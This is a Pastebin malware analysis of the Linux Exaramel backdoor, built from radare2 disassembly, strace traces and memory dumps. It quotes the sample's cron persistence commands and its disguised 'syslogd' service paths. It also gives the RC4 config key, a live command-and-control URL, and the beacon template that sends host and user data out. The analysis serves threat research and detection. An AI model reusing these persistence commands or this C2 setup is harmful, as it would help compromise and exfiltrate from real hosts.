Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // Linux/Exaramel (BlackEnergy) - APT ELF malware
- // ref: https://www.virustotal.com/gui/file/c39b4105e1b9da1a9cccb1dace730b1c146496c591ce0927fb035d48e9cb5c0f/details
- // binary forms (go-lang with "vendor" installation)
- // quick analysis by @unixfreaxjp on radare2 & tsurugi linux seccon
- // *) on going stuff is happening, the contents can be changed. #MalwareMustDie!
- ###############################
- # Summary #
- ###############################
- 0. Checking, cloning, and initiating run space.
- 1. Use both lock (/tmp/.applock) file(unix socket) & futex for protecting a running instance.
- i.e. new bins instance will be exusted due to lock file, dups clones controlled by futex
- 2. Aim persistence in cron & systemd startup.
- 3. Read encrypted config file, if not exist drop hardcoded crypt one.
- 4. Grab information & fills the template for C2 callbacks.
- 5. C2 establishment, sending information after read config and start listening.
- 6. Host resolving uses libnss; Networking supports system proxy.
- 7. Supported to remote command execution.
- 8. My opinion: Developer made work, not crooks.
- 9. Comments: https://twitter.com/malwaremustd1e/status/1216466744446840837
- ###############################
- # Binary Analysis #
- ###############################
- 1. Machine: Advanced Micro Devices X86-64
- 2. Symbol table '.symtab' contains 7726 entries.
- 3. go build ID
- 0x00400fd8 3133 3631 3236 3730 3763 6466 3136 6364 136126707cdf16cd
- 0x00400fe8 6133 3231 3562 6561 6435 3833 6331 6665 a3215bead583c1fe
- 0x00400ff8 3765 3237 3530 3636 48c7 4424 1000 0000 7e275066H.D$....
- Notes at offset 0x00000fc8 with length 0x00000038:
- Owner Data size Description
- Go 0x00000028 Unknown note type: (0x00000004)
- 4. Program Headers:
- Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
- PHDR 0x000040 0x0000000000400040 0x0000000000400040 0x000188 0x000188 R 0x1000
- NOTE 0x000fc8 0x0000000000400fc8 0x0000000000400fc8 0x000038 0x000038 R 0x4
- LOAD 0x000000 0x0000000000400000 0x0000000000400000 0x248c80 0x248c80 R E 0x1000
- LOAD 0x249000 0x0000000000649000 0x0000000000649000 0x1ac10f 0x1ac10f R 0x1000
- LOAD 0x3f6000 0x00000000007f6000 0x00000000007f6000 0x02f7e0 0x052400 RW 0x1000
- GNU_STACK 0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW 0x8
- LOOS+5041580 0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 0x8
- 5. Go syntax v1.8
- /usr/lib/go-1.8/lib/time/zoneinfo.zip
- ###############################
- # Static Reversing Analysis #
- ###############################
- [0x00455940]> pdf
- ┌ 18: entry0 (int64_t arg_8h);
- │ ; arg int64_t arg_8h @ rsp+0x8
- │ 0x00455940 488d742408 lea rsi, [arg_8h]
- │ 0x00455945 488b3c24 mov rdi, qword [rsp]
- │ 0x00455949 488d05100000. lea rax, [main] ; sym.go.main
- │ ; 0x455960 ; "H\x8d\x05\x89\xc2\xff\xff\xff\xe0\xcc\xcc\xcc\xcc\xcc\xcc\u030b|$\b\xb8\xe7"
- └ 0x00455950 ffe0 jmp rax
- --- more ---
- :
- [0x00455940]> s sym.main.main
- [0x00647540]> pd 6
- ; CODE XREF from sym.main.main @ 0x648803
- ;-- sym.go.main.main:
- ┌ 4808: sym.main.main ();
- │ bp: 0 (vars 0, args 0)
- │ sp: 105 (vars 105, args 0)
- │ rg: 0 (vars 0, args 0)
- │ 0x00647540 64488b0c25f8. mov rcx, qword fs:[0xfffffffffffffff8]
- │ 0x00647549 488d842408fc. lea rax, [rsp - 0x3f8]
- │ 0x00647551 483b4110 cmp rax, qword [rcx + 0x10]
- │ ┌─< 0x00647555 0f86a3120000 jbe 0x6487fe
- │ │ 0x0064755b 4881ec780400. sub rsp, 0x478
- │ │ 0x00647562 4889ac247004. mov qword [var_470h], rbp
- --- more ---
- :
- [0x00647540]> pdsf
- ;-- sym.go.main.main:
- 0x00647572 call sym.main.getCurrentDir
- 0x006475b4 call sym.runtime.concatstring2
- 0x006475d0 call sym.time.Now
- 0x00647618 call sym.time.Time.String
- 0x0064768a call sym.net.Listen
- 0x006476d0 call sym.runtime.makechan
- 0x00647727 call fcn.00454c1d fcn.00454c1d
- 0x006477ba call sym.os_signal.Notify
- 0x006477f9 call sym.runtime.newproc
- 0x0064783c call sym.runtime.newobject
- 0x0064787c call sym.app_vendor_configur.LoadConfig
- 0x00647905 obj.main.defaulthost.str // <====== C2 placeholder var
- 0x00647968 call sym.app_vendor_configur.UpdateConfig
- 0x00647981 call sym.runtime.makechan
- 0x006479a7 call sym.runtime.makechan
- 0x006479cd call sym.runtime.makechan
- 0x006479ea call sym.runtime.newobject
- 0x00647a38 call sym.runtime.newobject
- 0x00647a63 call fcn.00454c20 fcn.00454c20
- 0x00647af4 call fcn.00454f96 fcn.00454f96
- 0x00647b01 call sym.app_vendor_worker.__Worker_.CheckAdapt
- 0x00647bbd call sym.app_vendor_worker.__Worker_.GetUser
- 0x00647be8 call sym.app_vendor_worker.__Worker_.GetOS
- 0x00647c27 call sym.runtime.newproc
- 0x00647c51 call fcn.00454bfa fcn.00454bfa
- 0x00647c77 call sym.runtime.newselect
- 0x00647ca2 call sym.runtime.selectrecv
- --- more ---
- // seek persistency #1
- chdir("/var/spool/cron"), 1) = 0;
- execve("/bin/sh", ["/bin/sh", "-c", "(crontab -l 2>/dev/null) | grep /test/Exaramel && echo 'true' || echo 'false'"]) = 0;
- execve("/usr/bin/crontab", ["crontab", "-l"]) = 0;
- execve("/bin/sh", ["/bin/sh", "-c", "(crontab -l 2>/dev/null; echo '*/1 * * * * /test/Exaramel') | crontab -"]) = 0;
- execve("/bin/sh", ["/bin/sh", "-c", "(crontab -l 2>/dev/null; echo '@reboot /test/Exaramel') | crontab -"]) = 0;
- // persistency #2
- stat("/etc/rc.d/syslogger",..) = 0;
- stat("/etc/init/syslogd.conf",..) = 0;
- stat("/etc/systemd/system/syslogd.service",..) = 0;
- stat("/etc/init.d/syslogd",..) = 0;
- // check user
- execve("/bin/sh", ["/bin/sh", "-c", "whoami"]
- // used for sending data to c2 with hardcoded template:
- generation=%d&guid=%s&platform=%s&version=%d&whoami=%s%0A
- // lock runfile
- "/tmp/.applock"
- code: getsockname(3, {sa_family=AF_FILE, path="/tmp/.applock"}, [16])
- // Code execution environment (is initiated)
- 0x32676 16 15 os/exec.Command
- 0x32686 23 22 os/exec.interfaceEqual
- 0x3269d 20 19 os/exec.(*Cmd).envv
- 0x326b1 21 20 os/exec.(*Cmd).stdin
- 0x326c6 22 21 os/exec.(*Cmd).stdout
- 0x326dc 22 21 os/exec.(*Cmd).stderr
- 0x326f2 32 31 os/exec.(*Cmd).writerDescriptor
- 0x32712 32 31 os/exec.(*Cmd).closeDescriptors
- 0x32732 21 20 os/exec.(*Cmd).Start
- 0x32747 27 26 os/exec.(*ExitError).Error
- 0x32762 20 19 os/exec.(*Cmd).Wait
- 0x32776 26 25 os/exec.(*Cmd).StdoutPipe
- 0x32790 26 25 os/exec.(*Cmd).StderrPipe
- 0x327aa 15 14 os/exec.init.1
- 0x327b9 23 22 os/exec.findExecutable
- 0x327d0 17 16 os/exec.LookPath
- 0x327e1 29 28 os/exec.interfaceEqual.func1
- 0x327fe 27 26 os/exec.(*Cmd).stdin.func1
- 0x32819 38 37 os/exec.(*Cmd).writerDescriptor.func1
- 0x3283f 27 26 os/exec.(*Cmd).Start.func1
- 0x3285a 27 26 os/exec.(*Cmd).Start.func2
- 0x32875 21 20 os/exec.init.1.func1
- 0x3288a 13 12 os/exec.init <====
- --- more ---
- :
- void sym.os_exec.init(undefined8 param_1, undefined8 param_2, int64_t param_3)
- {
- uint64_t *puVar1;
- int64_t extraout_RDX;
- int64_t in_FS_OFFSET;
- undefined8 uStack24;
- undefined8 uStack16;
- while (puVar1 = (uint64_t *)(*(int64_t *)(in_FS_OFFSET + 0xfffffff8) + 0x10),
- *(BADSPACEBASE **)0x20 < (undefined *)*puVar1 || (undefined *)*(BADSPACEBASE **)0x20 == (undefined *)*puVar1)
- {
- sym.runtime.morestack_noctxt(param_1, param_2, param_3);
- param_3 = extraout_RDX;
- }
- if (1 < (uint8_t)obj.os_exec.initdone.) {
- return;
- }
- if (obj.os_exec.initdone. == (code)0x1) {
- sym.runtime.throwinit();
- do {
- invalidInstructionException();
- } while( true );
- }
- obj.os_exec.initdone. = (code)0x1;
- sym.bytes.init();
- sym.context.init();
- sym.io.init();
- sym.os.init();
- sym.path_filepath.init();
- sym.runtime.init();
- sym.strconv.init();
- sym.strings.init();
- sym.sync.init();
- sym.syscall.init();
- sym.errors.New();
- _obj.os_exec.ErrNotFound = uStack24;
- if (_obj.runtime.writeBarrier == 0) {
- *(undefined8 *)0x826548 = uStack16;
- } else {
- sym.runtime.writebarrierptr();
- }
- sym.os_exec.init.1();
- obj.os_exec.initdone. = (code)0x2;
- return;
- }
- :
- ; CALL XREF from sym.app_vendor_worker.init @ 0x64623b
- ;-- sym.go.os_exec.init:
- / 234: sym.os_exec.init ();
- | bp: 0 (vars 0, args 0)
- | sp: 4 (vars 4, args 0)
- | rg: 0 (vars 0, args 0)
- | 0x00623e10 mov rcx, qword fs:[0xfffffffffffffff8]
- | 0x00623e19 cmp rsp, qword [rcx + 0x10]
- | ,=< 0x00623e1d jbe 0x623ef0
- | | 0x00623e23 sub rsp, 0x28
- ; ---------------------------
- | : 0x0064623b call sym.os_exec.init ;[1]
- | : 0x00646240 call sym.path_filepath.init ;[2]
- | : 0x00646245 call sym.regexp.init ;[3]
- | : 0x0064624a call sym.runtime.init ;[4]
- | : 0x0064624f call sym.strconv.init ;[5]
- | : 0x00646254 call sym.strings.init ;[6]
- | : 0x00646259 call sym.syscall.init ;[7]
- | : 0x0064625e call sym.time.init ;[8]
- | : 0x00646263 mov byte [obj.app_vendor_worker.initdone.], 2 ; [0x843345:1]=0
- | : 0x0064626a mov rbp, qword [rsp]
- | : 0x0064626e add rsp, 8
- --- more ---
- :
- ; CALL XREF from sym.main.init @ 0x648a74
- ;-- sym.go.app_vendor_worker.init:
- / 173: sym.app_vendor_worker.init ();
- | bp: 0 (vars 0, args 0)
- | sp: 0 (vars 0, args 0)
- | rg: 0 (vars 0, args 0)
- | 0x006461d0 mov rcx, qword fs:[0xfffffffffffffff8]
- | 0x006461d9 cmp rsp, qword [rcx + 0x10]
- | ,=< 0x006461dd jbe 0x646273
- | | 0x006461e3 sub rsp, 8
- ; ---------------------------
- | : 0x00648a74 call sym.app_vendor_worker.init ;[1]
- | : 0x00648a79 call sym.app_vendor_github.com_satori_go_2euuid.init ;[2]
- | : 0x00648a7e mov byte [obj.main.initdone.], 2 ; [0x843374:1]=0
- | : 0x00648a85 mov rbp, qword [rsp]
- | : 0x00648a89 add rsp, 8
- | : 0x00648a8d ret
- | : ; CODE XREF from sym.main.init @ 0x6489fd
- | : 0x00648a8e call sym.runtime.morestack_noctxt ;[3]
- \ `=< 0x00648a93 jmp sym.main.init
- 0x00648a98 int3
- 0x00648a99 int3
- --- more ---
- :
- [0x00648a23 [xAdvc]0 0% 180 Exaramel]> pd $r @ sym.main.init+51 # 0x648a23
- | : ; CODE XREF from sym.main.init @ 0x648a18
- | ,==< 0x00648a23 7507 jne 0x648a2c
- | |: 0x00648a25 e896e8ddff call sym.runtime.throwinit ;[1]
- | |: 0x00648a2a 0f0b ud2
- | |: ; CODE XREF from sym.main.init @ 0x648a23
- | `--> 0x00648a2c c60541a91f00. mov byte [obj.main.initdone.], 1 ; [0x843374:1]=0
- | : 0x00648a33 e8d837e9ff call sym.app_vendor_configur.init ;[2]
- | : 0x00648a38 e82310e7ff call sym.fmt.init ;[3]
- | : 0x00648a3d e89e48e9ff call sym.math_rand.init ;[4]
- | : 0x00648a42 e8896becff call sym.net.init ;[5]
- | : 0x00648a47 e804bcfcff call sym.app_vendor_network.init ;[6]
- | : 0x00648a4c e8efdde4ff call sym.os.init ;[7]
- | : 0x00648a51 e86ad3fcff call sym.os_signal.init ;[8]
- | : 0x00648a56 e8e51ce9ff call sym.path_filepath.init ;[9]
- | : 0x00648a5b e8b02cfdff call sym.app_vendor_scheduler.init ;[?]
- | : 0x00648a60 e8cbd8e1ff call sym.strconv.init ;[?]
- | : 0x00648a65 e8b6afe7ff call sym.strings.init ;[?]
- | : 0x00648a6a e80172e3ff call sym.syscall.init ;[?]
- | : 0x00648a6f e83c6ee4ff call sym.time.init ;[?]
- | : 0x00648a74 e857d7ffff call sym.app_vendor_worker.init ;[?]
- | : 0x00648a79 e8f2e6ffff call sym.app_vendor_github.com_satori_go_2euuid.init ;[?]
- | : 0x00648a7e c605efa81f00. mov byte [obj.main.initdone.], 2 ; [0x843374:1]=0
- | : 0x00648a85 488b2c24 mov rbp, qword [rsp]
- | : 0x00648a89 4883c408 add rsp, 8
- | : 0x00648a8d c3 ret
- --- more ---
- :
- if (1 < (uint8_t)obj.main.initdone.) {
- return;
- }
- if (obj.main.initdone. == (code)0x1) {
- sym.runtime.throwinit();
- do {
- invalidInstructionException();
- } while( true );
- }
- obj.main.initdone. = (code)0x1;
- sym.app_vendor_configur.init();
- sym.fmt.init();
- sym.math_rand.init();
- sym.net.init();
- sym.app_vendor_network.init();
- sym.os.init();
- sym.os_signal.init();
- sym.path_filepath.init();
- sym.app_vendor_scheduler.init();
- sym.strconv.init();
- sym.strings.init();
- sym.syscall.init();
- sym.time.init();
- sym.app_vendor_worker.init();
- sym.app_vendor_github.com_satori_go_2euuid.init();
- obj.main.initdone. = (code)0x2;
- return;
- }
- // proxy supported..
- 0x005f8bc0 42 1298 sym.net_http.ProxyFromEnvironment
- 0x005f90e0 6 141 sym.net_http.ProxyURL
- 0x005fad00 7 248 sym.net_http.__connectMethod_.proxyAuth
- 0x005ffa30 67 1631 sym.net_http.useProxy
- 0x00607600 1 28 sym.net_http.ProxyURL.func1
- --- more ---
- :
- 0x9788ea 36 35 net/http.(*connectMethod).proxyAuth
- 0x97961f 18 17 net/http.useProxy
- 0x97b757 24 23 net/http.ProxyURL.func1
- 0x9dbc43 22 21 net/http.httpProxyEnv
- 0x9dbc6d 23 22 net/http.httpsProxyEnv
- 0x9dc038 20 19 net/http.noProxyEnv
- 0x768d 22 21 net/http.httpProxyEnv
- 0x76a3 23 22 net/http.httpsProxyEnv
- 0x78de 20 19 net/http.noProxyEnv
- 0x2e857 30 29 net/http.ProxyFromEnvironment
- 0x2e875 18 17 net/http.ProxyURL
- --- more ---
- :
- void sym.net_http.__connectMethod_.proxyAuth(undefined8 param_1, undefined8 param_2, int64_t param_3)
- {
- uint64_t *puVar1;
- int64_t extraout_RDX;
- int64_t in_FS_OFFSET;
- int64_t *in_stack_00000008;
- undefined8 in_stack_00000010;
- undefined8 in_stack_00000018;
- while (puVar1 = (uint64_t *)(*(int64_t *)(in_FS_OFFSET + 0xfffffff8) + 0x10),
- *(BADSPACEBASE **)0x20 < (undefined *)*puVar1 || (undefined *)*(BADSPACEBASE **)0x20 == (undefined *)*puVar1)
- {
- sym.runtime.morestack_noctxt(param_1, param_2, param_3);
- param_3 = extraout_RDX;
- }
- if (*in_stack_00000008 != 0) {
- if (*(int64_t *)(*in_stack_00000008 + 0x20) != 0) {
- sym.net_http.basicAuth();
- sym.runtime.concatstring2();
- return;
- }
- return;
- }
- return;
- }
- --- more ---
- :
- ; CODE XREF from sym.net_http.__connectMethod_.proxyAuth @ 0x5fadf3
- ; CALL XREFS from sym.net_http.__Transport_.dialConn @ 0x5fe1b1, 0x5ff325
- ;-- sym.go.net_http.__connectMethod_.proxyAuth:
- / 248: sym.net_http.__connectMethod_.proxyAuth (int64_t arg_8h, int64_t arg_10h, int64_t arg_18h);
- | bp: 0 (vars 0, args 0)
- | sp: 10 (vars 7, args 3)
- | rg: 0 (vars 0, args 0)
- | 0x005fad00 mov rcx, qword fs:[0xfffffffffffffff8]
- | 0x005fad09 cmp rsp, qword [rcx + 0x10]
- | ,=< 0x005fad0d jbe 0x5fadee
- | | 0x005fad13 sub rsp, 0x40
- ; ---------------------------
- | 0x005fe1b1 call sym.net_http.__connectMethod_.proxyAuth ;[1] M=======
- | 0x005fe1b6 mov rax, qword [var_4b0h]
- | 0x005fe1bb mov rcx, qword [var_4b8h]
- | 0x005fe1c0 test rax, rax
- | ,=< 0x005fe1c3 jne 0x5ff1c6
- | | ; CODE XREF from sym.net_http.__Transport_.dialConn @ 0x5ff1fa
- | | 0x005fe1c9 lea rax, [0x0068f0a0]
- | | 0x005fe1d0 mov qword [rsp], rax
- | | 0x005fe1d4 mov rax, qword [var_300h]
- | | 0x005fe1dc mov qword [var_4b8h], rax
- | | 0x005fe1e1 mov rcx, qword [var_2f8h]
- --- more ---
- :
- ;-- sym.go.net_http.__Transport_.dialConn:
- 0x005fda2d call sym.runtime.newobject
- 0x005fda58 int64_t arg1
- 0x005fda5c int64_t arg2
- 0x005fda6e call fcn.00454fa4 fcn.00454fa4
- 0x005fda7b call sym.net_http.__connectMethod_.key
- 0x005fda80 int64_t arg2
- 0x005fda85 int64_t arg1
- 0x005fda97 call fcn.00454f96 fcn.00454f96
- 0x005fdab4 call sym.runtime.makechan
- :
- 0x005fdb69 call sym.runtime.newobject
- 0x005fdbad int64_t arg2
- 0x005fdbbf call fcn.00454f96 fcn.00454f96
- 0x005fdc8f call sym.net_http_httptrace.ContextClientTrace
- 0x005fdd41 call sym.net_http.__connectMethod_.addr ;"tcp -> <== ==> @@@ MB) \r\t\n as at fp= in is lr: of on pc= sp: sp=!= 0%x\r\n><'\'"
- 0x005fdd7d call rcx
- 0x005fde21 call sym.crypto_tls.__Conn_.Handshake
- 0x005fde70 call sym.runtime.newproc
- 0x005fdeeb call fcn.00454f34 fcn.00454f34
- 0x005fdf17 call rbx
- 0x005fdf29 call sym.runtime.newobject
- 0x005fdf47 call sym.crypto_tls.__Conn_.ConnectionState
- --- end ---
- // drop config
- openat(AT_FDCWD, "{current dir}config.json", 1|2|0|0, 0666) = 0 ;
- // write data from below and encrypting...(call: go crypto RC4 library)
- 0x006f9990 6874 7470 733a 2f2f 3137 362e 3331 2e32 https://176.31.2
- 0x006f99a0 3235 2e32 3034 2f61 7069 2f76 3100 0000 25.204/api/v1...
- // encryption key :
- in:
- [0x006da25a [xAdvc]0 37% 16384 Exaramel]> pd $r @ hit2_0
- ; DATA XREFS from sym.main.main @ 0x647823, 0x6486eb
- │ 0x00647787 488d8c249800. lea rcx, [var_98h]
- │ 0x0064778f 48898c24b002. mov qword [var_2b0h], rcx
- │ 0x00647797 48890424 mov qword [rsp], rax
- │ 0x0064779b 488d8c247802. lea rcx, [var_278h]
- │ 0x006477a3 48894c2408 mov qword [var_8h], rcx
- │ 0x006477a8 48c744241004. mov qword [var_10h], 4
- │ 0x006477b1 48c744241804. mov qword [var_18h], 4
- │ 0x006477ba e8e1defcff call sym.os_signal.Notify
- │ 0x006477bf 488b84242001. mov rax, qword [var_120h]
- │ 0x006477c7 4889442410 mov qword [var_10h], rax
- │ 0x006477cc 488b84244001. mov rax, qword [var_140h]
- │ 0x006477d4 4889442418 mov qword [var_18h], rax
- │ 0x006477d9 488b8c244801. mov rcx, qword [var_148h]
- │ 0x006477e1 48894c2420 mov qword [var_20h], rcx
- │ 0x006477e6 c70424180000. mov dword [rsp], 0x18
- │ 0x006477ed 488d1534160a. lea rdx, [0x006e8e28]
- │ 0x006477f4 4889542408 mov qword [var_8h], rdx
- │ 0x006477f9 e8729cdeff call sym.runtime.newproc
- │ 0x006477fe 488b05c3e71d. mov rax, qword [0x00825fc8]
- │ 0x00647805 4885c0 test rax, rax
- │ ┌─< 0x00647808 7527 jne 0x647831
- │ │ 0x0064780a 48c705b3e71d. mov qword [0x00825fc8], 0xa
- │ │ 0x00647815 8b0515bf1f00 mov eax, dword [obj.runtime.writeBarrier]
- │ │ 0x0064781b 85c0 test eax, eax
- │┌──< 0x0064781d 0f85bd0e0000 jne 0x6486e0
- │││ 0x00647823 488d05302a09. lea rax, [hit2_0] ; 0x6da25a ; "s0m3t3rr0r" <======KEY!!
- │││ 0x0064782a 4889058fe71d. mov qword [obj.main.key], rax
- --- more ---
- :
- 0x006da25a [xAdvc]0 37% 16384 Exaramel]> ps
- 0x006da25a <nil>runtime: s0m3t3rr0r(++junk)
- // config
- ~/test$ r2 config.json
- -- Invert the block bytes using the 'I' key in visual mode
- [0x00000000]> px
- - offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
- 0x00000000 4f65 e400 ded5 2b33 3a61 37b5 1fd8 ffdf Oe....+3:a7.....
- 0x00000010 9f57 b918 6d1e e9b8 8116 057f a636 08e2 .W..m........6..
- 0x00000020 4b5a 15c1 57a1 a0e9 1297 49e8 2942 8f78 KZ..W.....I.)B.x
- 0x00000030 e267 95ad aead 0846 5074 d17f 9eab e8c6 .g.....FPt......
- 0x00000040 7c29 d378 4fd7 5071 c311 53f5 de02 32d0 |).xO.Pq..S...2.
- 0x00000050 3e93 45e8 de72 a424 70fb 00e0 f30f 5be0 >.E..r.$p.....[.
- 0x00000060 37eb 47a9 d57e ebee 583f 339c 5672 23c4 7.G..~..X?3.Vr#.
- 0x00000070 adbf d997 2f99 5a7f 063c 9ba5 7028 15b7 ..../.Z..<..p(..
- 0x00000080 3ce6 da90 98ae 8c34 f8b2 0331 a445 d517 <......4...1.E..
- 0x00000090 a946 173b c506 c450 0f9e 6a48 d068 b6c8 .F.;...P..jH.h..
- 0x000000a0 ffff ffff ffff ffff ffff ffff ffff ffff ................
- // the file is encrypted with RC4 with key above, decoded with any flavor:
- {"Hosts":["https://176.31.225.204/api/v1"],"Proxy":"","Version":"1","Guid":"c65f5f15-2e64-4b41-9c95-59f0d94f5fca","Next":20,"Datetime":"","Timeout":30,"Def":20}
- // c2
- 0x6f9990 30 29 https://176.31.225.204/api/v1
- // you can seek callback OS on:
- connect(6, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("176.31.225.204")
- // files enumeration (this happened before C2 networking started per clone)
- getdents64($SOCKET, {{d_ino=$INODENUM, d_off=$OFFSETNUM,..
- loop
- {
- lstat("{$CURRPATH}/{files}"..);
- openat(AT_FDCWD, "{$CURRPATH}/{$DIRS}"..
- }
- getdents64($SOCKET, {}, $MMAP);
- close($SOCKET);
- ###############################
- # Dynamic Analysis #
- ###############################
- // works:
- 00400000-00649000 r-xp 00000000 08:01 397381 /test/Exaramel
- 00649000-007f6000 r--p 00249000 08:01 397381 /test/Exaramel
- 007f6000-00826000 rw-p 003f6000 08:01 397381 /test/Exaramel
- 00826000-00849000 rw-p 00000000 00:00 0
- c000000000-c000001000 rw-p 00000000 00:00 0
- c41fff8000-c420100000 rw-p 00000000 00:00 0
- 7f32836ed000-7f328378d000 rw-p 00000000 00:00 0
- 7fff6fc00000-7fff6fc21000 rw-p 00000000 00:00 0 [stack]
- 7fff6fdb9000-7fff6fdba000 r-xp 00000000 00:00 0 [vdso]
- ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
- Exaramel cwd DIR 8,1 4096 397369 /test
- Exaramel rtd DIR 8,1 4096 2 /
- Exaramel txt REG 8,1 6469139 397381 /test/Exaramel
- Exaramel 0u CHR 136,0 0t0 3 /dev/pts/0
- Exaramel 1u CHR 136,0 0t0 3 /dev/pts/0
- Exaramel 2u CHR 136,0 0t0 3 /dev/pts/0
- Exaramel 3u unix 0xffff88000f2c6480 0t0 6334 /tmp/.applock
- Exaramel 4u 0000 0,9 0 1203 anon_inode
- Exaramel 5r CHR 1,9 0t0 1210 /dev/urandom
- Exaramel 6r FIFO 0,8 0t0 6350 pipe
- Exaramel 8r FIFO 0,8 0t0 6351 pipe
- Exaramel cwd DIR 8,1 4096 397369 /test
- Exaramel rtd DIR 8,1 4096 2 /
- Exaramel txt REG 8,1 6469139 397381 /test/Exaramel
- Exaramel 0u CHR 136,0 0t0 3 /dev/pts/0
- Exaramel 1u CHR 136,0 0t0 3 /dev/pts/0
- Exaramel 2u CHR 136,0 0t0 3 /dev/pts/0
- Exaramel 3u unix 0xffff88000f2c6480 0t0 6334 /tmp/.applock
- Exaramel 4u 0000 0,9 0 1203 anon_inode
- Exaramel 5r CHR 1,9 0t0 1210 /dev/urandom
- Exaramel 6r IPv4 6424 0t0 TCP $LOCAL:34573->176.31.225.204:443
- Exaramel cwd DIR 8,1 4096 397369 /test
- Exaramel rtd DIR 8,1 4096 2 /
- Exaramel txt REG 8,1 6469139 397381 /test/Exaramel
- Exaramel 0u CHR 136,0 0t0 3 /dev/pts/0
- Exaramel 1u CHR 136,0 0t0 3 /dev/pts/0
- Exaramel 2u CHR 136,0 0t0 3 /dev/pts/0
- Exaramel 3u unix 0xffff88000f2c6480 0t0 6334 /tmp/.applock
- Exaramel 4u 0000 0,9 0 1203 anon_inode
- Exaramel 5r CHR 1,9 0t0 1210 /dev/urandom
- // Live radare2 forensics (before)
- 0xc4200a6440 2304 /test/Exaramel]> pxx @ obj.runtime.enoptrbss+528867392 # 0xc4200a6440
- - offset - 0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF
- 0xc4200a6440 Access-Control-Allow-Origin.....Content-Disposition.............
- 0xc4200a6480 If-Unmodified-Since.............Proxy-Authenticate..............
- 0xc4200a64c0 Proxy-Authorization.............Strict-Transport-Security.......
- 0xc4200a6500 Transfer-Encoding...............config.json.....................
- 0xc4200a6540 ..m...............m...............m.....................`.. ....
- 0xc4200a6580 listen unix /tmp/.applock.......bind: address already in use....
- 0xc4200a65c0 App has already started!.......................................
- // Live radare2 forensics (after)
- :
- 0xc42000ed90 Authorization...Content-EncodingContent-LocationContent-Range...Expect..If-MatchLinkMax-
- 0xc42000ede8 ForwardsRangeReferer....RefreshTrailer..Retry-After.....Vary100101102200Www-Authenticate
- 0xc42000ee40 201202203204205.206207208226300.301302303304305.307308400401402.403404405406407.40840941
- 0xc42000ee98 0411412.413414415416417.418422423424426.428429431451500.501502503504505.506507508510511.
- 0xc42000eef0 $.m.............j6n.....&.........m..............!n..............bn.....4.........m.....
- 0xc42000ef48 ......../test/`........ E. ..../tmp/.applock............................................
- 0xc42000efa0 rH..*.E?.[......&.............../dev/urandom............@.. ............................
- 0xc42000eff8 ................................Hosts...................Proxy...................Version.
- 0xc42000f050 ................Guid....................Next....................Datetime................
- 0xc42000f0a8 Timeout.................Def.............................................................
- :
- 0xc42000f408 /bin/sh................./bin/sh.-c......SHELL=/bin/bash.TERM=vt100......HUSHLOGIN=FALSE.
- 0xc42000f460 USER=nyan_apt....SHLVL=1.........HOME=/test.LOGNAME=test......._=./Exaramel...1.m.......
- 0xc42000f4b8 ........`.......... ....`.......... ..../dev/null.......... ....... ....................
- 0xc42000f510 /bin/sh./bin/sh.-c.whoami.......SHELL=/bin/bash.TERM=vt100......HUSHLOGIN=FALSE.USER=nyan
- 0xc42000f568 _apt.....SHLVL=1.mung....HOME=/test..LOGNAME=test...._=./Exaramel........test../bin/uname
- 0xc42000f5c0 `.m............./usr/bin/uname../usr/bin/uname../bin/uname......`.......... ....`.......
- 0xc42000f618 ... ..../dev/null.......... ....... ............uname.................../bin/uname......
- 0xc42000f670 -a.TERM=vt100...SHELL=/bin/bash.HUSHLOGIN=FALSE.USER=test....SHLVL=1.nyan_apt%0A.HOME=/te
- 0xc42000f6c8 st.LOGNAME=test...._=./Exaramel..........`.....@.. ....... ....$.......... .............
- 0xc42000f720 P.. ....I.........m...............m...........nyan_apt%0A...............................
- :
- 0xc42004a36f .*/1 * * * * /test/Exaramel.@reboot /test/Exaramel.true.................................
- 0xc42004a4cf ..`. ............................................Linux xxxxxxxxxxxxxxxxxxxxxxxxxx #1 SMP
- 0xc42004a527 xxxxxxxxxxxxxxxxxxxxxx GNU/Linux.......................................................
- 0xc42004c660 (crontab -l 2>/dev/null) | grep //test/Exaramel && echo 'true' || echo 'false'.........
- :
- 0xc420053148 ........................................................................................
- 0xc4200531a0 /etc/systemd/system/syslogd.service.....................................................
- 0xc4200531f8 ........................................................................................
- :
- 0xc4200533d3 ........................................................................................
- 0xc42005342b .....................https://176.31.225.204/api/v1/auth/app.............................
- 0xc420053483 .............................q`........ ...............................................
- :
- 0xc4200551e0 generation=1&guid=7248d60f-2a8f-453f-ac5b-19f5e0d7a3b0&platform=Linux+xxxxxxxxxxxxxxxxx
- 0xc420055238 xxxxxxx+%231+SMP+xxxxxxxxxxxxxx+x86_64+GNU%2FLinux%0A&version=1&whoami=nyan_apt%0A.....
- // crontab tampering artifact
- munmap(0x7f75952fb000, 4096) = 0
- socket(PF_FILE, SOCK_DGRAM|SOCK_CLOEXEC, 0) = 3
- connect(3, {sa_family=AF_FILE, path="/dev/log"}, 110) = 0
- sendto(3, "<78>Jan 10 07:55:51 crontab[2547]: (test) LIST (test)", 53, MSG_NOSIGNAL, NULL, 0) = 53
- ---
- # MalwareMustDie! - Don't spread malware - spread LOVE! @unixfreaxjp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement